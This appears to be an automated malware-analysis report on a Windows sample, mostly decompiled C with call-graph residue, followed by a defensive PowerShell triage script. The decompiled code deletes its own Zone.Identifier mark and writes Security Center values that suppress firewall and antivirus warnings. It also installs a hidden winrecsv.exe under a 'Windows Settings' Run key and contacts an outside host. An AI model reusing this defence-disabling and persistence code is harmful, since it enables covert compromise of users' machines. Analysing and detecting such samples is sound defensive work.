40bab0 InterlockedExchangeAdd 5145->5149 5146->5145 5146->5148 5150 40bacd 5149->5150 5161 40bac6 5149->5161 5166 40b9c0 5150->5166 5153 40baed InterlockedIncrement 5163 40baf7 5153->5163 5154 40a390 13 API calls 5154->5163 5155 40bb20 5173 409820 inet_ntoa 5155->5173 5157 40bb2c 5158 40bbf0 InterlockedDecrement 5157->5158 5188 409940 shutdown closesocket 5158->5188 5159 40b8f0 6 API calls 5159->5163 5161->5145 5162 408e60 __aligned_recalloc_base 7 API 
calls 5162->5163 5163->5154 5163->5155 5163->5158 5163->5159 5163->5162 5165 408fb0 __aligned_recalloc_base 3 API calls 5163->5165 5174 40a4f0 5163->5174 5165->5163 5167 40b9cd socket 5166->5167 5168 40b9e2 htons connect 5167->5168 5169 40ba3f 5167->5169 5168->5169 5171 40ba2a 5168->5171 5169->5167 5170 40ba33 5169->5170 5170->5153 5170->5161 5189 409940 shutdown closesocket 5171->5189 5173->5157 5184 40a501 5174->5184 5177 408fb0 __aligned_recalloc_base 3 API calls 5178 40a884 5177->5178 5178->5163 5179 40a51f 5179->5177 5180 40a240 20 API calls 5180->5184 5183 40a390 13 API calls 5183->5184 5184->5179 5184->5180 5184->5183 5185 409f40 25 API calls 5184->5185 5190 40a410 5184->5190 5197 409fb0 EnterCriticalSection 5184->5197 5202 405430 5184->5202 5207 405470 5184->5207 5212 405340 5184->5212 5219 4053a0 5184->5219 5185->5184 5188->5161 5189->5170 5191 40a421 lstrlenA 5190->5191 5192 40ae60 7 API calls 5191->5192 5194 40a43f 5192->5194 5193 40a4cf 5193->5184 5194->5191 5196 40a44b 5194->5196 5195 408fb0 __aligned_recalloc_base 3 API calls 5195->5193 5196->5193 5196->5195 5198 409fc8 5197->5198 5199 40a004 LeaveCriticalSection 5198->5199 5222 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5198->5222 5199->5184 5201 409ff3 5201->5199 5223 4053d0 5202->5223 5205 405469 5205->5184 5206 40bf50 17 API calls 5206->5205 5208 4053d0 65 API calls 5207->5208 5209 40548f 5208->5209 5210 4054bc 5209->5210 5233 4052f0 5209->5233 5210->5184 5236 4044c0 EnterCriticalSection 5212->5236 5214 40538d 5214->5184 5215 40535a 5215->5214 5241 405250 5215->5241 5218 408fb0 __aligned_recalloc_base 3 API calls 5218->5214 5248 404580 EnterCriticalSection 5219->5248 5221 4053c2 5221->5184 5222->5201 5226 4053e3 5223->5226 5224 405420 5224->5205 5224->5206 5226->5224 5227 4043d0 EnterCriticalSection 5226->5227 5228 40b4f0 63 API calls 5227->5228 5230 4043f0 5228->5230 5229 40449e LeaveCriticalSection 5229->5226 5230->5229 5231 408fb0 __aligned_recalloc_base 3 API calls 5230->5231 5232 
40449b 5231->5232 5232->5229 5234 40a1a0 13 API calls 5233->5234 5235 405335 5234->5235 5235->5210 5238 4044de 5236->5238 5237 40456a LeaveCriticalSection 5237->5215 5238->5237 5239 409020 8 API calls 5238->5239 5240 40453c 5239->5240 5240->5237 5242 408e60 __aligned_recalloc_base 7 API calls 5241->5242 5243 405262 memcpy 5242->5243 5244 40a1a0 13 API calls 5243->5244 5245 4052cc 5244->5245 5246 408fb0 __aligned_recalloc_base 3 API calls 5245->5246 5247 4052db 5246->5247 5247->5218 5272 40b550 5248->5272 5251 4047be LeaveCriticalSection 5251->5221 5252 40b4f0 63 API calls 5254 4045bb 5252->5254 5253 4046d3 5255 4046fc 5253->5255 5256 4040f0 15 API calls 5253->5256 5254->5251 5254->5253 5258 408fb0 __aligned_recalloc_base 3 API calls 5254->5258 5257 408fb0 __aligned_recalloc_base 3 API calls 5255->5257 5256->5255 5259 40471d 5257->5259 5260 404632 5258->5260 5259->5251 5261 40472c CreateFileW 5259->5261 5262 409020 8 API calls 5260->5262 5261->5251 5263 40474f 5261->5263 5264 404642 5262->5264 5267 4047aa FlushFileBuffers CloseHandle 5263->5267 5268 40476c WriteFile 5263->5268 5265 408fb0 __aligned_recalloc_base 3 API calls 5264->5265 5266 404669 5265->5266 5269 40ae60 7 API calls 5266->5269 5267->5251 5268->5263 5270 4046a0 5269->5270 5271 4058a0 10 API calls 5270->5271 5271->5253 5275 40aaa0 5272->5275 5277 40aab3 5275->5277 5276 409020 8 API calls 5276->5277 5277->5276 5278 40aa00 62 API calls 5277->5278 5280 40aacd 5277->5280 5282 406920 61 API calls 5277->5282 5278->5277 5279 408fb0 __aligned_recalloc_base 3 API calls 5281 4045a4 5279->5281 5280->5279 5281->5251 5281->5252 5282->5277 5360 40edd0 GetQueuedCompletionStatus 5361 40ee12 5360->5361 5362 40ee88 5360->5362 5363 40ee17 WSAGetOverlappedResult 5361->5363 5367 40ebe0 5361->5367 5363->5361 5364 40ee39 WSAGetLastError 5363->5364 5364->5361 5366 40ee53 GetQueuedCompletionStatus 5366->5361 5366->5362 5368 40ed72 InterlockedDecrement setsockopt closesocket 5367->5368 5369 40ebf4 5367->5369 5370 40ecb9 
5368->5370 5369->5368 5371 40ebfc 5369->5371 5370->5366 5387 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5371->5387 5373 40ec01 InterlockedExchange 5374 40ec18 5373->5374 5375 40ecce 5373->5375 5374->5370 5378 40ec29 InterlockedDecrement 5374->5378 5379 40ec3c InterlockedDecrement InterlockedExchangeAdd 5374->5379 5376 40ece7 5375->5376 5377 40ecd7 InterlockedDecrement 5375->5377 5380 40ecf2 5376->5380 5381 40ed07 InterlockedDecrement 5376->5381 5377->5366 5378->5366 5382 40ecaf 5379->5382 5396 40e960 WSASend 5380->5396 5384 40ed69 5381->5384 5388 40eb70 5382->5388 5384->5366 5385 40ecfe 5385->5366 5387->5373 5389 40eb80 InterlockedExchangeAdd 5388->5389 5390 40eb7c 5388->5390 5391 40ebd3 5389->5391 5392 40eb97 InterlockedIncrement 5389->5392 5390->5370 5391->5370 5393 40ead0 4 API calls 5392->5393 5394 40ebc6 5393->5394 5394->5391 5395 40ebcc InterlockedDecrement 5394->5395 5395->5391 5397 40e9d0 5396->5397 5398 40e992 WSAGetLastError 5396->5398 5397->5385 5398->5397 5399 40e99f 5398->5399 5400 40e9d6 5399->5400 5401 40e9a6 Sleep WSASend 5399->5401 5400->5385 5401->5397 5401->5398 5730 40f090 5731 40f144 5730->5731 5732 40f0ae 5730->5732 5733 40f2cd NtQueryVirtualMemory 5732->5733 5735 40f0c9 5733->5735 5734 40f1b8 RtlUnwind 5734->5735 5735->5731 5735->5734 5736 40e290 5737 40e2a7 5736->5737 5743 40e320 5736->5743 5738 40e2b7 5737->5738 5739 40e2d5 EnterCriticalSection 5737->5739 5740 40e30c LeaveCriticalSection DeleteCriticalSection 5739->5740 5744 40e2ed 5739->5744 5741 408fb0 __aligned_recalloc_base 3 API calls 5740->5741 5741->5743 5742 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5742->5744 5744->5742 5745 40e30b 5744->5745 5745->5740 5746 40b890 5751 40b830 5746->5751 5749 40b830 send 5750 40b8be 5749->5750 5752 40b841 send 5751->5752 5753 40b875 5752->5753 5754 40b85e 5752->5754 5753->5749 5753->5750 5754->5752 5754->5753 5755 40bc10 5756 409c30 4 API calls 5755->5756 5757 40bc23 5756->5757 5758 40bab0 129 API calls 
5757->5758 5759 40bc3a 5757->5759 5758->5759 5760 405a10 ExitThread 5761 404490 5762 40442b 5761->5762 5763 408fb0 __aligned_recalloc_base 3 API calls 5762->5763 5764 40449b LeaveCriticalSection 5763->5764 5414 4046dc 5417 4045dc 5414->5417 5415 4046d3 5416 4046fc 5415->5416 5418 4040f0 15 API calls 5415->5418 5419 408fb0 __aligned_recalloc_base 3 API calls 5416->5419 5417->5415 5420 408fb0 __aligned_recalloc_base 3 API calls 5417->5420 5418->5416 5421 40471d 5419->5421 5422 404632 5420->5422 5423 40472c CreateFileW 5421->5423 5424 4047be LeaveCriticalSection 5421->5424 5425 409020 8 API calls 5422->5425 5423->5424 5426 40474f 5423->5426 5427 404642 5425->5427 5430 4047aa FlushFileBuffers CloseHandle 5426->5430 5431 40476c WriteFile 5426->5431 5428 408fb0 __aligned_recalloc_base 3 API calls 5427->5428 5429 404669 5428->5429 5432 40ae60 7 API calls 5429->5432 5430->5424 5431->5426 5433 4046a0 5432->5433 5434 4058a0 10 API calls 5433->5434 5434->5415 5766 40de1f 5767 40dde0 5766->5767 5768 40de4b memmove 5767->5768 5769 40de5e 5767->5769 5768->5767 4250 405a20 Sleep 4251 405a48 4250->4251 4252 405a5a FindWindowA 4251->4252 4253 4061df CreateMutexA GetLastError 4251->4253 4252->4251 4256 405a7a Sleep MoveFileA MoveFileA FindWindowA 4252->4256 4254 406201 ExitProcess 4253->4254 4255 406209 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4253->4255 4265 406294 4255->4265 4257 405ac1 Sleep MoveFileA 4256->4257 4258 405adc Sleep 4256->4258 4257->4258 4259 405af3 4258->4259 4260 405b7a 9 API calls 4259->4260 4261 405b0e 8 API calls 4259->4261 4262 405c02 8 API calls 4260->4262 4263 405cf4 6 API calls 4260->4263 4261->4259 4268 405cdc InternetCloseHandle DeleteFileW 4262->4268 4292 405c7d 4262->4292 4269 405d79 7 API calls 4263->4269 4270 405fca 4263->4270 4264 406581 Sleep RegOpenKeyExA 4266 4065b2 8 API calls 4264->4266 4267 406698 RegOpenKeyExA 4264->4267 4265->4264 4334 40d4a0 GetLocaleInfoA 4265->4334 4266->4267 4272 4067a4 Sleep 
[Call-graph edge list, continued (rendering residue of the interactive graph viewer; node numbers refer to code addresses in the range 401000-40eabb). The visible portion resolves the Win32 APIs reached from each node: file moves, copies and deletions (MoveFileW, MoveFileA, CopyFileW, DeleteFileW, SetFileAttributesW), WinINet downloads (InternetOpenA, InternetOpenUrlA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile), registry writes (RegOpenKeyExW, RegSetValueExW, RegCloseKey), Winsock traffic (socket, bind, sendto, recvfrom, accept, connect, gethostbyname, CreateIoCompletionPort, WSAEnumNetworkEvents), clipboard access (SetClipboardViewer, OpenClipboard, GetClipboardData, SetClipboardData, EmptyClipboard, RegisterRawInputDevices), COM object creation (CoInitializeEx, CoCreateInstance), random-number generation (CryptAcquireContextW, CryptGenRandom), process and thread creation (CreateProcessW, ShellExecuteW, CreateThread, CreateEventA, DuplicateHandle), and file-system enumeration (FindNextFileW, PathMatchSpecW, MoveFileExW, GetVolumeInformationW, GetDiskFreeSpaceExW).]

Control-flow Graph

• Executed
• Not Executed

[Control-flow graph of the function at 405a20 (rendering residue of the interactive graph viewer; basic blocks 405a20-406918). The visible blocks contain FindWindowA/Sleep loops with repeated MoveFileW and DeleteFileW calls, CreateMutexA followed by GetLastError and a conditional ExitProcess, GetModuleFileNameW/PathFindFileNameW/ExpandEnvironmentStringsW/CopyFileW, registry persistence via RegOpenKeyExA with RegSetValueExA * 7 (twice) and RegOpenKeyExW with RegSetValueExW, InternetOpenA/InternetOpenUrlA downloads, WSAStartup followed by three CreateThread calls, and calls into 404200, 40d3d0, 4057b0, 40abd0, 40bea0, 40a020, 40bf50 * 4 and 40d740.]
C-Code - Quality: 98%
_entry_() {
	short _v524;
	char _v528;
	int _v532;
	int _v536;
	char _v1060;
	void* _v1064;
	char _v1588;
	short _v2108;
	intOrPtr _v2112;
	short _v2636;
	void* _v2640;
	struct HWND__* _v2644;
	long _v2648;
	struct HWND__* _v2652;
	void* _v2656;
	intOrPtr _v2660;
	long _v2664;
	void* _v2668;
	intOrPtr _v2672;
	intOrPtr _v2676;
	struct HWND__* _v2680;
	int _v2684;
	int _v2688;
	struct HWND__* _v2692;
	struct HWND__* _v2696;
	int _v2700;
	char _v3100;
	intOrPtr* _v3104;
	int _v3108;
	short _v3110;
	short _v3112;
	int _v3116;
	int _v3120;
	intOrPtr* _v3124;
	intOrPtr _v3128;
	short _v3130;
	signed int _v3136;
	intOrPtr* _v3140;
	intOrPtr _v3144;
	short _v3146;
	signed int _v3152;
	void* _t182;
	int _t190;
	intOrPtr _t210;
	signed char _t253;
	signed char _t264;
	struct HWND__* _t271;
	short _t367;
	intOrPtr _t371;
	short _t397;
	intOrPtr _t413;
	intOrPtr _t414;
	void* _t446;
	void* _t447;
	void* _t454;

	Sleep(0x1b58); // executed (7000 ms start-up delay)
	_v536 = 0;
	_v2112 = 0x2332;
	// Apparent filler loop: the window and file names below are arbitrary strings,
	// so FindWindowA normally returns 0 and only the counter increment (L40) runs.
	while(_v536 < _v2112) {
		_t271 = FindWindowA("579795729858927452784", 0); // executed
		_v2644 = _t271;
		if(_v2644 == 0) {
			L40:
			_v536 = _v536 + 1;
			continue;
		}
		Sleep(0x3e8);
		MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
		MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
		_v2680 = FindWindowA("579795729858927452784", 0);
		if(_v2680 != 0) {
			Sleep(0x3e8);
			MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
		}
		Sleep(0x3e8);
		_v2684 = 0;
		while(_v2684 < 0x7d0) {
			DeleteFileW(L"argarhargafafargh");
			MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
			Sleep(0xbb8);
			DeleteFileW(L"argarhargafafargh");
			MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
			MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
			Sleep(0xfa0);
			DeleteFileA("579795729858927452784");
			_v2684 = _v2684 + 1;
		}
		DeleteFileW(L"4yy4w4yw4fwgwgw");
		MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
		DeleteFileW(L"argarhargafafargh");
		MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
		DeleteFileW(L"argarhargafafargh");
		Sleep(0xbb8);
		Sleep(0xbb8);
		_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
		DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
		if(_v2668 == 0) {
			L16:
			Sleep(0x7d0);
			InternetCloseHandle(_v2668);
			Sleep(0x2710);
			ShowWindow(_v2644, 1);
			SetForegroundWindow(_v2644);
			MoveFileA("579795729858927452784", "2dgd828d8g8fg8g8g");
			_v2676 = 0x37;
			_v2660 = 0x2c;
			_v2672 = _v2676 + _v2660;
			if(_v2672 < 0x2328) {
				MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
				DeleteFileW(L"argarhargafafargh");
				MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
				Sleep(0x7d0);
				DeleteFileA("2dgd828d8g8fg8g8g");
				_v2692 = FindWindowA("aefafugaugfgauegf", 0);
				_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
				if(_v2668 != 0) {
					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
					_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
					if(_v2656 != 0) {
						DeleteFileW(L"argarhargafafargh");
						Sleep(0x1388);
						DeleteFileA("579795729858927452784");
						MoveFileW(L"4yy4w4yw4fwgwgw", L"argarhrharharfafrahth");
						Sleep(0xfa0);
						DeleteFileW(L"4yy4w4yw4fwgwgw");
					}
					InternetCloseHandle(_v2656);
					Sleep(0xdac);
				}
				InternetCloseHandle(_v2668);
				Sleep(0xfa0);
				if(_v2692 != 0) {
					ShowWindow(_v2692, 0);
					DeleteFileW(L"argarhargafafargh");
					SetForegroundWindow(_v2692);
					Sleep(0x1388);
					_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
					if(_v2668 != 0) {
						_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
						if(_v2656 != 0) {
							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
							Sleep(0x2710);
							DeleteFileW(L"4yy4w4yw4fwgwgw");
						}
						InternetCloseHandle(_v2656);
						DeleteFileW(L"argarhargafafargh");
						Sleep(0x64);
						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
						DeleteFileW(L"argarhargafafargh");
						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
						DeleteFileA("2dgd828d8g8fg8g8g");
					}
					InternetCloseHandle(_v2668);
				}
			}
			_v2664 = 0x1388;
			_v2648 = 0x1f4;
			while(_v2664 > _v2648) {
				_v2696 = FindWindowA("2dgd828d8g8fg8g8g", 0);
				if(_v2696 != 0) {
					Sleep(0x7d0);
					DeleteFileW(L"argarhargafafargh");
					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
					Sleep(0x1388);
					Sleep(0x1388);
					_v2648 = _v2648 + 1;
				}
			}
			if(PathFileExistsA("aefafugaugfgauegf") != 0) {
				DeleteFileA("579795729858927452784");
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				Sleep(0x1f4);
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
			}
			_v2652 = FindWindowA("aefyaiegfayegfg", 0);
			if(_v2652 != 0) {
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				SetForegroundWindow(_v2644);
				ShowWindow(_v2644, 1);
				Sleep(0x3a98);
				MoveFileA("feu8gf8g2gf8g2fg", "aefafugaugfgauegf");
				DeleteFileA("579795729858927452784");
				Sleep(0x1f4);
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				DeleteFileW(L"argarhargafafargh");
			}
			_v2700 = 0;
			while(_v2700 < 0xfa0) {
				MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
				DeleteFileW(L"4yy4w4yw4fwgwgw");
				Sleep(0x2328);
				MoveFileW(L"argarhrharharfafrahth", L"4yy4w4yw4fwgwgw");
				_v2700 = _v2700 + 1;
			}
			goto L40;
		}
		DeleteFileW(L"argarhargafafargh");
		MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
		Sleep(0x1388);
		DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
		Sleep(0xbb8);
		DeleteFileW(L"4yy4w4yw4fwgwgw");
		_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
		Sleep(0xbb8);
		if(_v2656 == 0) {
			L15:
			InternetCloseHandle(_v2656);
			DeleteFileW(L"4yy4w4yw4fwgwgw");
			goto L16;
		}
		_v2688 = 0;
		while(_v2688 < 0x7d0) {
			MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
			Sleep(0x7d0);
			MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
			Sleep(0xfa0);
			_v2688 = _v2688 + 1;
		}
		goto L15;
	}
	// Single-instance check: 0xb7 is ERROR_ALREADY_EXISTS, so a second copy
	// of the sample takes the other branch instead of continuing here.
	_t182 = CreateMutexA(0, 0, "984658"); // executed
	_v2640 = _t182;
	if(GetLastError() != 0xb7) {
		_v1064 = 0;
		_v528 = 1;
		GetModuleFileNameW(0, 0x414a30, 0x105);
		_v532 = PathFindFileNameW(0x414a30);
		// Delete the "<own path>:Zone.Identifier" alternate data stream, i.e. remove
		// the mark-of-the-web that records the file was downloaded from the Internet.
		wsprintfW( &_v524, L"%s:Zone.Identifier", 0x414a30);
		_t447 = _t446 + 0xc;
		DeleteFileW( &_v524);
		ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
		// Inline wide-string compare of the sample's own file name against "winrecsv.exe".
		_v3104 = L"winrecsv.exe";
		_v3108 = _v532;
		while(1) {
			_t190 = _v3108;
			_t367 =  *_t190;
			_v3110 = _t367;
			if(_t367 !=  *_v3104) {
				break;
			}
			if(_v3110 == 0) {
				L48:
				_v3116 = 0;
				L50:
				_v3120 = _v3116;
				if(_v3120 == 0) {
					L67:
					Sleep(0x1f4);
					// Write DWORD 1 (_v528) to the Security Center "Override" and "DisableNotify"
					// values under HKLM, which suppresses firewall, anti-virus, anti-spyware and
					// update warnings. The same set is written under the ...\Svc subkey below.
					if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064) == 0) {
						RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
						RegCloseKey(_v1064);
					}
					if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064) == 0) {
						RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
						RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
						RegCloseKey(_v1064);
					}
					Sleep(0x1f4);
					if((E0040B4A0() & 0x000000ff) != 0) {
						// ws2_32.dll import by ordinal #115 is WSAStartup; 0x202 requests Winsock 2.2.
						__imp__#115(0x202,  &_v3100);
                                                                                  									wsprintfW(0x414c40, L"%s\\tnnodes.dat",  &_v2636);
                                                                                  									wsprintfW(0x414620, L"%s\\tncmds.dat",  &_v2636);
                                                                                  									CreateThread(0, 0, E00404000, 0, 0, 0);
                                                                                  									Sleep(0x1f4);
                                                                                  									CreateThread(0, 0, E004050B0, 0, 0, 0);
                                                                                  									Sleep(0x1f4);
                                                                                  									CreateThread(0, 0, E00405900, 0, 0, 0);
                                                                                  									Sleep(0x2710);
                                                                                  									E00404200();
                                                                                  									E004057B0(E0040D3D0(),  &_v2636);
                                                                                  									 *0x414e64 = CreateEventA(0, 1, 0, 0);
                                                                                  									 *0x414e6c = E0040ABD0( &_v2636);
                                                                                  									 *0x414e68 = E0040BEA0( &_v2636);
                                                                                  									E0040A020();
                                                                                  									_t413 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t413, 0, E0040C360, 0, 0, 0);
                                                                                  									_t210 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t210, 0, E0040C2C0, 0, 0, 0);
                                                                                  									_t371 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t371, 0, E0040BE50, 0, 0, 0);
                                                                                  									_t414 =  *0x414e68; // 0x0
                                                                                  									E0040BF50(_t414, 0, E0040BC50, 0, 0, 0);
                                                                                  								}
                                                                                  								return 0;
                                                                                  							}
                                                                                  							if((E0040D4A0() & 0x000000ff) != 1) {
                                                                                  								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                  								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, L"winrecsv.exe");
                                                                                  								_t454 = _t447 + 0x10;
                                                                                  								if(CopyFileW(0x414a30,  &_v1588, 0) == 0) {
                                                                                  									L60:
                                                                                  									Sleep(0x1f4);
                                                                                  									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, L"winrecsv.exe");
                                                                                  									_t447 = _t454 + 0x10;
                                                                                  									if(CopyFileW(0x414a30,  &_v1060, 0) == 0) {
                                                                                  										goto L67;
                                                                                  									}
                                                                                  									SetFileAttributesW( &_v1060, 3);
                                                                                  									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  										L65:
                                                                                  										_t253 = E0040D740( &_v1060);
                                                                                  										_t447 = _t447 + 4;
                                                                                  										if((_t253 & 0x000000ff) != 1) {
                                                                                  											goto L67;
                                                                                  										}
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v3140 =  &_v1060;
                                                                                  									_v3144 = _v3140 + 2;
                                                                                  									do {
                                                                                  										_v3146 =  *_v3140;
                                                                                  										_v3140 = _v3140 + 2;
                                                                                  									} while (_v3146 != 0);
                                                                                  									_v3152 = _v3140 - _v3144 >> 1;
                                                                                  									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3152 + _v3152 + 2);
                                                                                  									RegCloseKey(_v1064);
                                                                                  									goto L65;
                                                                                  								}
                                                                                  								SetFileAttributesW( &_v1588, 3);
                                                                                  								if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  									L58:
                                                                                  									_t264 = E0040D740( &_v1588);
                                                                                  									_t454 = _t454 + 4;
                                                                                  									if((_t264 & 0x000000ff) != 1) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									ExitProcess(0);
                                                                                  								}
                                                                                  								_v3124 =  &_v1588;
                                                                                  								_v3128 = _v3124 + 2;
                                                                                  								do {
                                                                                  									_v3130 =  *_v3124;
                                                                                  									_v3124 = _v3124 + 2;
                                                                                  								} while (_v3130 != 0);
                                                                                  								_v3136 = _v3124 - _v3128 >> 1;
                                                                                  								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3136 + _v3136 + 2);
                                                                                  								RegCloseKey(_v1064);
                                                                                  								goto L58;
                                                                                  							}
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  						_t190 = _v3108;
                                                                                  						_t397 =  *((intOrPtr*)(_t190 + 2));
                                                                                  						_v3112 = _t397;
                                                                                  						_t86 = _v3104 + 2; // 0x6e0069
                                                                                  						if(_t397 !=  *_t86) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_v3108 = _v3108 + 4;
                                                                                  						_v3104 = _v3104 + 4;
                                                                                  						if(_v3112 != 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						goto L48;
                                                                                  					}
                                                                                  					asm("sbb eax, eax");
                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                  					_v3116 = _t190;
                                                                                  					goto L50;
                                                                                  				}
                                                                                  				ExitProcess(0); // executed
                                                                                  			}
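Added host-triage example (not code from the report or from the sample): the decompiled routine above writes seven Security Center override/notification values under both HKLM\SOFTWARE\Microsoft\Security Center and \Svc, copies itself to %windir%\winrecsv.exe (falling back to a second directory held in _v2636, which this excerpt does not resolve), marks the copy read-only and hidden (SetFileAttributesW with 3), and registers it under the Run key as "Windows Settings" (HKLM when the %windir% copy succeeded, HKCU otherwise). The script below checks a Windows host for exactly those artefacts. It assumes an elevated PowerShell session; the DWORD written to the Security Center values comes from _v528, whose content is not visible here, so any present value is reported rather than a specific one.

```powershell
# Host triage for the artefacts visible in the decompiled routine.
# Assumption: run elevated on the host under review. Not part of the report.

$findings = New-Object System.Collections.Generic.List[string]

# 1. Security Center override / notification-suppression values.
#    The sample writes all seven as REG_DWORD to both keys.
$scValues = 'FirewallOverride', 'FirewallDisableNotify', 'AntiSpywareOverride',
            'AntiVirusOverride', 'AntiVirusDisableNotify',
            'UpdatesOverride', 'UpdatesDisableNotify'
$scKeys = 'HKLM:\SOFTWARE\Microsoft\Security Center',
          'HKLM:\SOFTWARE\Microsoft\Security Center\Svc'
foreach ($key in $scKeys) {
    if (-not (Test-Path -LiteralPath $key)) { continue }
    $props = Get-ItemProperty -LiteralPath $key
    foreach ($name in $scValues) {
        $v = $props.$name
        if ($null -ne $v) {
            $findings.Add("SecurityCenter: $key\$name = $v")
        }
    }
}

# 2. Run-key persistence under the value name "Windows Settings".
#    HKLM is used when the %windir% copy succeeded, HKCU for the fallback copy.
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    if (-not (Test-Path -LiteralPath $key)) { continue }
    $val = (Get-ItemProperty -LiteralPath $key).'Windows Settings'
    if ($val) {
        $findings.Add("RunKey: $key\'Windows Settings' = $val")
    }
}

# 3. Dropped binary. Only the %windir% location is derivable from this excerpt;
#    add the fallback directory to $dropPaths once it is known for the host.
$dropPaths = @((Join-Path $env:windir 'winrecsv.exe'))
foreach ($p in $dropPaths) {
    if (Test-Path -LiteralPath $p) {
        $attrs = [System.IO.File]::GetAttributes($p)
        # SetFileAttributesW(path, 3) == FILE_ATTRIBUTE_READONLY (1) | FILE_ATTRIBUTE_HIDDEN (2)
        $hidden   = (($attrs -band [System.IO.FileAttributes]::Hidden)   -ne 0)
        $readOnly = (($attrs -band [System.IO.FileAttributes]::ReadOnly) -ne 0)
        $hash = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
        $findings.Add("DroppedFile: $p attrs=$attrs hidden=$hidden readonly=$readOnly sha256=$hash")
    }
}

if ($findings.Count -eq 0) { 'No winrecsv.exe / Security Center / Run-key artefacts found.' }
else { $findings }
```

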